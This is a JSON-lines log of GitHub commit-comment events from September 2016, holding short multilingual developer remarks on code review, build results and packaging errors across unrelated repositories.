{"id":"4636433639","type":"CommitCommentEvent","actor":{"login":"HongJinBom"},"repo":{"name":"HongJinBom/AndroidAR"},"payload":{"comment":{"id":19221826,"position":91,"line":191,"path":"app/src/main/java/com/tistory/fasdgoc/androidar/MainActivity.java","commit_id":"b87101a80f7e701828dcc819588c1ec91bf57ebc","created_at":"2016-09-29T10:43:01Z","updated_at":"2016-09-29T10:43:01Z","body":"else"}},"created_at":"2016-09-29T10:43:01Z"}
{"id":"4636435690","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19221830,"position":null,"line":null,"path":null,"commit_id":"8f9a5e14120f422919e75ea1d25e127301533de2","created_at":"2016-09-29T10:43:27Z","updated_at":"2016-09-29T10:43:27Z","body":"Works now, nice!"}},"created_at":"2016-09-29T10:43:27Z"}
{"id":"4636436564","type":"CommitCommentEvent","actor":{"login":"thomaspatzke"},"repo":{"name":"govolution/betterdefaultpasslist"},"payload":{"comment":{"id":19221831,"position":null,"line":null,"path":null,"commit_id":"7c20c24e997ba64b1772ae5543dfd1c0d484c1cf","created_at":"2016-09-29T10:43:37Z","updated_at":"2016-09-29T10:43:37Z","body":"dude, no reaction til now. plz bounty, now!"}},"created_at":"2016-09-29T10:43:37Z"}
{"id":"4636440734","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19221839,"position":null,"line":null,"path":null,"commit_id":"e56eb8d409c25de35d8da57d84a7b22974928bf0","created_at":"2016-09-29T10:44:33Z","updated_at":"2016-09-29T10:44:33Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 189](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1264&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-29T10:44:33Z"}
{"id":"4636441382","type":"CommitCommentEvent","actor":{"login":"kesslerm"},"repo":{"name":"basho/node_package"},"payload":{"comment":{"id":19221840,"position":5,"line":47,"path":"priv/base/env.sh","commit_id":"8d556bf0860fc628d273822dcf5fb063b107b3a1","created_at":"2016-09-29T10:44:41Z","updated_at":"2016-09-29T10:44:41Z","body":"This breaks with the default implementation of `id` on Solaris 10. Needs `/usr/xpg4/bin/id` on this platform"}},"created_at":"2016-09-29T10:44:41Z"}
{"id":"4636442255","type":"CommitCommentEvent","actor":{"login":"thomaspatzke"},"repo":{"name":"govolution/betterdefaultpasslist"},"payload":{"comment":{"id":19221841,"position":null,"line":null,"path":null,"commit_id":"7c20c24e997ba64b1772ae5543dfd1c0d484c1cf","created_at":"2016-09-29T10:44:54Z","updated_at":"2016-09-29T10:44:54Z","body":"this is not fair! i reported critical bug. if no bounty i will full disclosure!"}},"created_at":"2016-09-29T10:44:54Z"}
{"id":"4636443268","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19221844,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T10:45:07Z","updated_at":"2016-09-29T10:45:07Z","body":"AWS就应该用上Anycast避免这个问题.......\r\n之前说打不开大部分应该是移动用户，这么长时间了部分IP稍有变动也很正常，更新一下就好了\r\n至于指定IP对于电信用户是没有影响的（想办法要来了邻居的WiFi密码便有了移动电信双线嘻嘻嘻\r\n"}},"created_at":"2016-09-29T10:45:07Z"}
{"id":"4636444422","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19221846,"position":null,"line":null,"path":null,"commit_id":"e56eb8d409c25de35d8da57d84a7b22974928bf0","created_at":"2016-09-29T10:45:22Z","updated_at":"2016-09-29T10:45:22Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 189](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1264&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:49"}},"created_at":"2016-09-29T10:45:22Z"}
{"id":"4636446210","type":"CommitCommentEvent","actor":{"login":"bfredl"},"repo":{"name":"lambdalisue/vim-rplugin"},"payload":{"comment":{"id":19221853,"position":9,"line":11,"path":"python3/rplugin.py","commit_id":"1dfd38c5076c772121a92e074a5932455854c9cc","created_at":"2016-09-29T10:45:46Z","updated_at":"2016-09-29T10:45:46Z","body":"in neovim with python3, `surrogateescape` is used for decoding errors (and sometimes in vim, but not ubiquitously yet, see https://github.com/vim/vim/issues/1053 ) so it should probably here instead of \"ignore\""}},"created_at":"2016-09-29T10:45:46Z"}
{"id":"4636450927","type":"CommitCommentEvent","actor":{"login":"ashrafsarhan"},"repo":{"name":"ashrafsarhan/adv-r"},"payload":{"comment":{"id":19221856,"position":14,"line":15,"path":"spotifyr/tests/testthat/test_auth.R","commit_id":"a3b890871ee30ec27081a30e9fb790008f50508d","created_at":"2016-09-29T10:46:50Z","updated_at":"2016-09-29T10:46:50Z","body":"@Mattias99  You should assert specific status code like 400 for invalid client credentials. Using this way, you can't know whether you got **400** as bad request with invalid ID/secret or **500** as a server side error which are totally different."}},"created_at":"2016-09-29T10:46:50Z"}
{"id":"4636452674","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19221858,"position":3,"line":15,"path":"language-project/dao/src/main/java/com/dao/utility/DatabaseUtil.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-29T10:47:14Z","updated_at":"2016-09-29T10:47:14Z","body":"Дай пожалуйста линк на коммит\n\nOn 29.09.2016 8:54, fg78nc wrote:\n>\n> Cделано\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/fg78nc/f/commit/d42290f4bf4989fcf929d06843b604e4cdfe4a4c#commitcomment-19219213>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AM8Ng48apqUahAM0-AH53H79V_zu_sU9ks5qu1KZgaJpZM4KHoaV>.\n>\n\n"}},"created_at":"2016-09-29T10:47:14Z"}
{"id":"4636458199","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19221868,"position":5,"line":5,"path":"language-project/dao/.settings/org.eclipse.wst.common.project.facet.core.xml","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-29T10:48:31Z","updated_at":"2016-09-29T10:48:31Z","body":"да"}},"created_at":"2016-09-29T10:48:31Z"}
{"id":"4636458364","type":"CommitCommentEvent","actor":{"login":"JuleLaryushina"},"repo":{"name":"artezio-kseniav/text_summarization"},"payload":{"comment":{"id":19221869,"position":null,"line":null,"path":null,"commit_id":"3b9eec2782acc88832acefa4d21550b2da92e775","created_at":"2016-09-29T10:48:34Z","updated_at":"2016-09-29T10:48:34Z","body":"no_spec_topic_articles - статьи разных категорий\r\nplos_med_articles - статьи по медицине"}},"created_at":"2016-09-29T10:48:34Z"}
{"id":"4636465407","type":"CommitCommentEvent","actor":{"login":"aurusov"},"repo":{"name":"aurusov/raox"},"payload":{"comment":{"id":19221882,"position":102,"line":92,"path":"docs/reference/search.html","commit_id":"3619823f583763b0ba56225edd093ded3431b097","created_at":"2016-09-29T10:50:10Z","updated_at":"2016-09-29T10:50:10Z","body":"Да, обычно правлю."}},"created_at":"2016-09-29T10:50:10Z"}
{"id":"4636470976","type":"CommitCommentEvent","actor":{"login":"kumavis"},"repo":{"name":"Ambisafe/provider-engine"},"payload":{"comment":{"id":19221892,"position":null,"line":null,"path":null,"commit_id":"db27b6872e03817d98a7cd036880604fc86dd2d6","created_at":"2016-09-29T10:51:26Z","updated_at":"2016-09-29T10:51:26Z","body":"looks like the dist is out of date, this was fixed awhile ago"}},"created_at":"2016-09-29T10:51:26Z"}
{"id":"4636472250","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19221895,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-29T10:51:43Z","updated_at":"2016-09-29T10:51:43Z","body":"I have the start of that going...but the ToOneOf methods are quite\nproblematic. There needs to be a triply nested loop to generate them, and\nit still may not quite work.  The 3 variables are: current parameter index,\nnumber of new OneOf generics, and which index of the new OneOf will contain\nthe T{n} of the old one.\n\nI had to set it down Tuesday for work... If you don't get to it by the\nweekend, I will - everything else to support that infrastructure is taken\ncare of...I can push a branch for you to take w gander at, but it's very\nincomplete.\n\nOn Sep 29, 2016 6:35 AM, \"Will Mooar\" <notifications@github.com> wrote:\n\n> Looking at the examples within the readme on the front page it's\n> definitely reading much clearer now. I think it's time to get the JSON\n> serialisation working!\n>\n> Which raises an ugly issue, all of the Tn types need to be serializable.\n> And we need to store the value's type along with the value so we know how\n> to deserialize it. Heh, or an index. (!)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jagged/OneOf/commit/b5c4981bdd732dd7bfe336a25f1b0db0688f4795#commitcomment-19221753>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD_ohfbe-2kNZV1OnQcuJCD1OvoIwlfHks5qu5RngaJpZM4KIntt>\n> .\n>\n"}},"created_at":"2016-09-29T10:51:43Z"}
{"id":"4636472631","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19221898,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-29T10:51:49Z","updated_at":"2016-09-29T10:51:49Z","body":"iteration (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2391 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.67%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T10:51:49Z"}
{"id":"4636474346","type":"CommitCommentEvent","actor":{"login":"vickiizhang"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":19221901,"position":null,"line":null,"path":null,"commit_id":"2bb11c4527192f0477310b2e9d0b944705240765","created_at":"2016-09-29T10:52:13Z","updated_at":"2016-09-29T10:52:13Z","body":"1. 中英文中间需空一个空格\r\n2. 公共请求参数链接错误\r\n请修正以上问题~"}},"created_at":"2016-09-29T10:52:13Z"}
{"id":"4636478249","type":"CommitCommentEvent","actor":{"login":"BIRDRED"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19221904,"position":null,"line":null,"path":null,"commit_id":"a85ad0dd9e1994e11905108d1aacc154fff827c4","created_at":"2016-09-29T10:53:08Z","updated_at":"2016-09-29T10:53:08Z","body":"Professor , eu coloquei as imagens mas o trabalho é feito em grupo com Cristian Carvalho eu coloquei somente pra constar"}},"created_at":"2016-09-29T10:53:08Z"}
{"id":"4636484680","type":"CommitCommentEvent","actor":{"login":"AlanDrake"},"repo":{"name":"adventuregamestudio/ags"},"payload":{"comment":{"id":19221910,"position":34,"line":277,"path":"Common/game/main_game_file.cpp","commit_id":"88093d34d7fb2033f9d367d2d82d2df0b5d6a6c8","created_at":"2016-09-29T10:54:37Z","updated_at":"2016-09-29T10:54:37Z","body":"Memory leak ?\r\nI tried out cppchecker and it raised a flag here:\r\n> Object pointed by an 'auto_ptr' is destroyed using operator 'delete'. This means that you should only use 'auto_ptr' for pointers obtained with operator 'new'. This excludes arrays, which are allocated by operator 'new[]' and must be deallocated by operator 'delete[]'."}},"created_at":"2016-09-29T10:54:37Z"}
{"id":"4636494882","type":"CommitCommentEvent","actor":{"login":"alphastar868"},"repo":{"name":"eloaders/I-Nex"},"payload":{"comment":{"id":19221922,"position":null,"line":null,"path":null,"commit_id":"049f4ec7da2db5786c5cb3c585db824119b351af","created_at":"2016-09-29T10:57:00Z","updated_at":"2016-09-29T10:57:00Z","body":"**_rpmbuild -bb I-nex.spec_** on CentOS reports the following since this commit:\r\n```\r\n+ cd /home/alphastar868/rpmbuild/BUILD\r\n+ cd I-Nex-a17e2ea5c37e3d4abf59e9e4cd4b490c48a7b604\r\n+ DOCDIR=/home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex-7.4.0.1\r\n+ export DOCDIR\r\n+ /usr/bin/mkdir -p /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex-7.4.0.1\r\n+ cp -pr docs/copyright /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex-7.4.0.1\r\ncp: cannot stat 'docs/copyright': No such file or directory\r\nerror: Bad exit status from /var/tmp/rpm-tmp.9uXTXq (%doc)\r\n\r\n\r\nRPM build errors:\r\n    Bad exit status from /var/tmp/rpm-tmp.9uXTXq (%doc)\r\n```\r\n\r\nEarlier in the _rpmbuild_ process:\r\n```\r\nInstall docs...\r\nmake -C docs install\r\nmake[1]: lsb_release: Command not found\r\nmake[1]: Entering directory `/home/alphastar868/rpmbuild/BUILD/I-Nex-a17e2ea5c37e3d4abf59e9e4cd4b490c48a7b604/docs'\r\nCreate directory...\r\nmkdir -p /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex\r\nInstalling Docs I-Nex.LICENSE...\r\ninstall -Dm644 I-Nex.LICENSE \"/home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex/I-Nex.LICENSE\"\r\nCreate directory...\r\nmkdir -p /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex\r\nInstalling Docs Pastebinit.LICENSE...\r\ninstall -Dm644 Pastebinit.LICENSE \"/home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/share/doc/i-nex/Pastebinit.LICENSE\"\r\nmake[1]: Leaving directory `/home/alphastar868/rpmbuild/BUILD/I-Nex-a17e2ea5c37e3d4abf59e9e4cd4b490c48a7b604/docs'\r\nInstall JSON...\r\nmake -C JSON install\r\nmake[1]: lsb_release: Command not found\r\nmake[1]: Entering directory `/home/alphastar868/rpmbuild/BUILD/I-Nex-a17e2ea5c37e3d4abf59e9e4cd4b490c48a7b604/JSON'\r\nchmod +x i-nex-edid\r\nchmod +x i-nex-cpuid\r\ntest -d /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin || mkdir /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin\r\ninstall -m 0755 i-nex-edid /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin\r\ntest -d /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin || mkdir /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin\r\ninstall -m 0755 i-nex-cpuid /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin\r\ntest -d /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin || mkdir /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin\r\ninstall -m 0755 i-nex-dimms /home/alphastar868/rpmbuild/BUILDROOT/i-nex-7.4.0.1-20160928.bzr933.gita17e2ea.el7.centos.x86_64/usr/bin\r\nmake[1]: Leaving directory `/home/alphastar868/rpmbuild/BUILD/I-Nex-a17e2ea5c37e3d4abf59e9e4cd4b490c48a7b604/JSON'\r\nInstall I-Nex...\r\n```\r\n\r\nThe BUILD directory (_~/rpmbuild/BUILD/I-Nex-a17e2ea5c37e3d4abf59e9e4cd4b490c48a7b604/_) **has** a _debian/copyright_ file, but it seems that it does not get copied to the right directory to be included by _rpmbuild_.\r\n"}},"created_at":"2016-09-29T10:57:00Z"}
{"id":"4636510533","type":"CommitCommentEvent","actor":{"login":"Amar91swat"},"repo":{"name":"w-shackleton/android-netspoof"},"payload":{"comment":{"id":19221947,"position":5,"line":5,"path":".travis.yml","commit_id":"c744187b0ad99e67f8a488396de43d64799aa149","created_at":"2016-09-29T11:00:41Z","updated_at":"2016-09-29T11:00:41Z","body":"Go"}},"created_at":"2016-09-29T11:00:41Z"}
{"id":"4636516003","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19221956,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T11:01:55Z","updated_at":"2016-09-29T11:01:55Z","body":"Now, this will specifically check if `window.process.type === \"renderer\"` which is only (afaik) true in an electron renderer..."}},"created_at":"2016-09-29T11:01:55Z"}
{"id":"4636528942","type":"CommitCommentEvent","actor":{"login":"gregsmirnov"},"repo":{"name":"open-sausages/silverstripe-reports"},"payload":{"comment":{"id":19221979,"position":13,"line":13,"path":"phpunit.xml.dist","commit_id":"d9cd0b7715c1065d2f755ca7ac235647f3070f0d","created_at":"2016-09-29T11:04:53Z","updated_at":"2016-09-29T11:04:53Z","body":"all source files are expected to be in the \"code\" folder"}},"created_at":"2016-09-29T11:04:53Z"}
{"id":"4636530096","type":"CommitCommentEvent","actor":{"login":"idma88"},"repo":{"name":"idma88/site-req"},"payload":{"comment":{"id":19221980,"position":null,"line":null,"path":null,"commit_id":"a3c22566a98f9ddd94189a7718ab147e99e73401","created_at":"2016-09-29T11:05:07Z","updated_at":"2016-09-29T11:05:07Z","body":"Done [issue #13]"}},"created_at":"2016-09-29T11:05:07Z"}
{"id":"4636536561","type":"CommitCommentEvent","actor":{"login":"sctoy"},"repo":{"name":"sctoy/hello-world"},"payload":{"comment":{"id":19221991,"position":null,"line":null,"path":null,"commit_id":"84a5fb642b4d326c3d2eeaf9a57f14ec57a9d420","created_at":"2016-09-29T11:06:36Z","updated_at":"2016-09-29T11:06:36Z","body":"Just getting a GitHub account going here."}},"created_at":"2016-09-29T11:06:36Z"}
{"id":"4636538308","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19221997,"position":null,"line":null,"path":null,"commit_id":"51312dccec8e435318e6dbbe730969d18b33b27d","created_at":"2016-09-29T11:07:00Z","updated_at":"2016-09-29T11:07:00Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=31)"}},"created_at":"2016-09-29T11:07:00Z"}
{"id":"4636538713","type":"CommitCommentEvent","actor":{"login":"guylancaster999"},"repo":{"name":"jnicol/tweet-php"},"payload":{"comment":{"id":19222000,"position":null,"line":null,"path":null,"commit_id":"2f09f8de1be758dbeec175fdad7fcef7ce9a47d7","created_at":"2016-09-29T11:07:06Z","updated_at":"2016-09-29T11:07:06Z","body":" How do you get it to search for a #tag? twitter_screen_name dosent seem to work\r\n"}},"created_at":"2016-09-29T11:07:06Z"}
{"id":"4636543621","type":"CommitCommentEvent","actor":{"login":"JeonGiHyeon"},"repo":{"name":"veloai/pct"},"payload":{"comment":{"id":19222008,"position":29,"line":27,"path":"Otani/index.html","commit_id":"8bd74bac54fd01c9f3ae64f75ed1e377b2332dc0","created_at":"2016-09-29T11:08:13Z","updated_at":"2016-09-29T11:08:13Z","body":"여기 수정했어요"}},"created_at":"2016-09-29T11:08:13Z"}
{"id":"4636548915","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/hydra"},"payload":{"comment":{"id":19222020,"position":null,"line":null,"path":null,"commit_id":"fb5e7f95707e58207c7ed696d462247f5e37c9c9","created_at":"2016-09-29T11:09:26Z","updated_at":"2016-09-29T11:09:26Z","body":":tada: !"}},"created_at":"2016-09-29T11:09:26Z"}
{"id":"4636549237","type":"CommitCommentEvent","actor":{"login":"wangshengyong"},"repo":{"name":"wangshengyong/Hello"},"payload":{"comment":{"id":19222022,"position":null,"line":null,"path":null,"commit_id":"2f465604baf0079a6443c2806e00d23278ebab64","created_at":"2016-09-29T11:09:30Z","updated_at":"2016-09-29T11:09:30Z","body":"init commit"}},"created_at":"2016-09-29T11:09:30Z"}
{"id":"4636555087","type":"CommitCommentEvent","actor":{"login":"andrewdavidwong"},"repo":{"name":"QubesOS/qubes-doc"},"payload":{"comment":{"id":19222029,"position":15,"line":67,"path":"installing/supported-versions.md","commit_id":"92436058ffcec1ab9457f08dd968e359500b8af4","created_at":"2016-09-29T11:10:49Z","updated_at":"2016-09-29T11:10:49Z","body":"@marmarek: I specified these versions based on the packages available in our repos. Should any other versions be added?"}},"created_at":"2016-09-29T11:10:49Z"}
{"id":"4636557635","type":"CommitCommentEvent","actor":{"login":"vasdf"},"repo":{"name":"vasdf/potato"},"payload":{"comment":{"id":19222032,"position":null,"line":null,"path":null,"commit_id":"542c2dd763ced7bfc04a1fbca79856a728ea01f1","created_at":"2016-09-29T11:11:26Z","updated_at":"2016-09-29T11:11:26Z","body":"juuh"}},"created_at":"2016-09-29T11:11:26Z"}
{"id":"4636557644","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19222033,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-29T11:11:26Z","updated_at":"2016-09-29T11:11:26Z","body":"Interesting, I had a much simpler idea in mind.  Assuming Newtonsoft.JSON knows which OneOf<...> to instantiate due to it deserializing into another containing class (eg. SomeThing within the serialization unit tests), all it's missing is the value and it's type/index.  \r\n\r\nAssuming we serialize/deserialize those two bits of info, I suspect we can then instantiate the value and poke it into the instance.\r\n\r\nSounds easy, right?  =)"}},"created_at":"2016-09-29T11:11:26Z"}
{"id":"4636558372","type":"CommitCommentEvent","actor":{"login":"HanLin0516"},"repo":{"name":"HanLin0516/Writhing-exercise"},"payload":{"comment":{"id":19222034,"position":null,"line":null,"path":null,"commit_id":"7f9643cffda991f9248472cf2b304dbee63e8b28","created_at":"2016-09-29T11:11:36Z","updated_at":"2016-09-29T11:11:36Z","body":"> 轰隆！——\r\n 天痛苦地打了个闪，玉双脑袋一懵，骤然想起过去的年轻。\r\n\r\n转折突兀。\r\n"}},"created_at":"2016-09-29T11:11:36Z"}
{"id":"4636560082","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19222042,"position":5,"line":66,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/stringBasedPostfixTemplates.kt","commit_id":"f25cc7d11bd9a019a224f6251bf82afd9af40b3e","created_at":"2016-09-29T11:12:00Z","updated_at":"2016-09-29T11:12:00Z","body":"Ok, will do"}},"created_at":"2016-09-29T11:12:00Z"}
{"id":"4636561514","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"leekelleher/umbraco-ditto-labs"},"payload":{"comment":{"id":19222046,"position":null,"line":null,"path":null,"commit_id":"07432a3f4b776ef0274fbc6f0ffcc5b6f45a5e15","created_at":"2016-09-29T11:12:19Z","updated_at":"2016-09-29T11:12:19Z","body":"You could probably still allow [ChildrenAs] with a single doc type alias string param, just feed it into another constructor converting it to an array. Would be a nice convenience method given most may only need a single doc type."}},"created_at":"2016-09-29T11:12:19Z"}
{"id":"4636562255","type":"CommitCommentEvent","actor":{"login":"usmetanina"},"repo":{"name":"usmetanina/sharp-skb"},"payload":{"comment":{"id":19222047,"position":34,"line":41,"path":"WorkWithTriangle/WorkWithTriangle/Triangle.cs","commit_id":"f1b031183230cb4dc80a393816a1f41b9afe48f4","created_at":"2016-09-29T11:12:30Z","updated_at":"2016-09-29T11:12:30Z","body":"1858029af9658d88b0762ed91779fa42064d8728"}},"created_at":"2016-09-29T11:12:30Z"}
{"id":"4636563740","type":"CommitCommentEvent","actor":{"login":"rmehner"},"repo":{"name":"jkleinsc/broccoli-serviceworker"},"payload":{"comment":{"id":19222053,"position":null,"line":null,"path":null,"commit_id":"4041aed9d60e57d1966eef02a047649db4bcc8bf","created_at":"2016-09-29T11:12:51Z","updated_at":"2016-09-29T11:12:51Z","body":"@miguelcobain see #31 for the reasoning. I agree, we probably should use `baseURL` or `rootURL` (depends on the Ember version) for that."}},"created_at":"2016-09-29T11:12:51Z"}
{"id":"4636564110","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19222056,"position":null,"line":null,"path":null,"commit_id":"a02e38fee818c96d3caa1b00f052c784dbd4244d","created_at":"2016-09-29T11:12:56Z","updated_at":"2016-09-29T11:12:56Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bug 982608 - [doc] setting up a cache tier with hot and cold storage should be enhanced / more clear](https://trello.com/c/XQeysDY9/2006-bug-982608-doc-setting-up-a-cache-tier-with-hot-and-cold-storage-should-be-enhanced-more-clear)"}},"created_at":"2016-09-29T11:12:56Z"}
{"id":"4636566507","type":"CommitCommentEvent","actor":{"login":"1456985913"},"repo":{"name":"liuyananlalala/learngit"},"payload":{"comment":{"id":19222062,"position":null,"line":null,"path":null,"commit_id":"b051c67bacd8f3efe2533ef4d16914086e688a9d","created_at":"2016-09-29T11:13:29Z","updated_at":"2016-09-29T11:13:29Z","body":"jgiuoihipoi"}},"created_at":"2016-09-29T11:13:29Z"}
{"id":"4636567700","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"leekelleher/umbraco-ditto-labs"},"payload":{"comment":{"id":19222065,"position":null,"line":null,"path":null,"commit_id":"07432a3f4b776ef0274fbc6f0ffcc5b6f45a5e15","created_at":"2016-09-29T11:13:45Z","updated_at":"2016-09-29T11:13:45Z","body":"    public ChildrenAsAttribute(string alias) \r\n         : this(new[]{ alias })\r\n    { }\r\n\r\n    public ChildrenAsAttribute (string[] aliases)\r\n    {\r\n        // Do your thing\r\n    }"}},"created_at":"2016-09-29T11:13:45Z"}
{"id":"4636570470","type":"CommitCommentEvent","actor":{"login":"leekelleher"},"repo":{"name":"leekelleher/umbraco-ditto-labs"},"payload":{"comment":{"id":19222073,"position":null,"line":null,"path":null,"commit_id":"07432a3f4b776ef0274fbc6f0ffcc5b6f45a5e15","created_at":"2016-09-29T11:14:25Z","updated_at":"2016-09-29T11:14:25Z","body":"`params` works fine with a single value 👍 no need for both.  See `MyModel1` in the unit-test."}},"created_at":"2016-09-29T11:14:25Z"}
{"id":"4636573233","type":"CommitCommentEvent","actor":{"login":"OrionsHammer"},"repo":{"name":"Nihlus/matlab-gravity"},"payload":{"comment":{"id":19222077,"position":44,"line":167,"path":"bodies/GravitationalBody.m","commit_id":"c8ed4245f259d71dbe7da1f302b02457ace74e8a","created_at":"2016-09-29T11:15:03Z","updated_at":"2016-09-29T11:15:03Z","body":"Blir inte detta this.XYChange = this.XY +(F * u) - this.XY, Vilket kan ändras till this.XYChange = F * u?"}},"created_at":"2016-09-29T11:15:03Z"}
{"id":"4636574472","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19222079,"position":1,"line":1,"path":"idea/testData/codeInsight/postfix/whenExpression.kt.after","commit_id":"fb4af3e6b3bd7d11c6332b35fff23f898406a6ef","created_at":"2016-09-29T11:15:21Z","updated_at":"2016-09-29T11:15:21Z","body":"I don't think it's really necessary, they all work through the same mechanism"}},"created_at":"2016-09-29T11:15:21Z"}
